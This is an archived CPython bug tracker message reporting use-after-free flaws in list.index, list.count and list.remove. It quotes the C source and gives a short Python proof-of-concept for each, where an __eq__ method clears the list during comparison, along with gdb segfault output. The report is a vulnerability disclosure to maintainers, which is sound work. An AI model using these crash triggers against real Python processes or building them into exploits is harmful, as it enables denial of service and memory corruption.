This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author LCatro
Recipients LCatro, serhiy.storchaka
Date 2019-10-28.05:49:17
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1572241758.28.0.0734328499539.issue38610@roundup.psfhosted.org>
In-reply-to
Content 
Code 1 :

static PyObject *
list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start,
                Py_ssize_t stop)
// ...
    for (i = start; i < stop && i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);  <=  self->ob_item[i] can uaf ..


PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)   #  <== that will call the object recall function tp_repr and call it ..
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = [ poc() ]
list1.index(list1)   #  list_index_impl() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_3.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)

===== 

Code 2 :

static PyObject *
list_count(PyListObject *self, PyObject *value)
{
    Py_ssize_t count = 0;
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);  //  <=


PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.count(list1)   #  list_count() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_4.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)


===

Code 3 :

static PyObject *
list_remove(PyListObject *self, PyObject *value)
/*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/
{
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
		Py_INCREF(self->ob_item[i]);
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);


PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.remove(list1)   #  list_count() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_5.py
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)
History
Date User Action Args
2019-10-28 05:49:18LCatrosetrecipients: + LCatro, serhiy.storchaka
2019-10-28 05:49:18LCatrosetmessageid: <1572241758.28.0.0734328499539.issue38610@roundup.psfhosted.org>
2019-10-28 05:49:18LCatrolinkissue38610 messages
2019-10-28 05:49:17LCatrocreate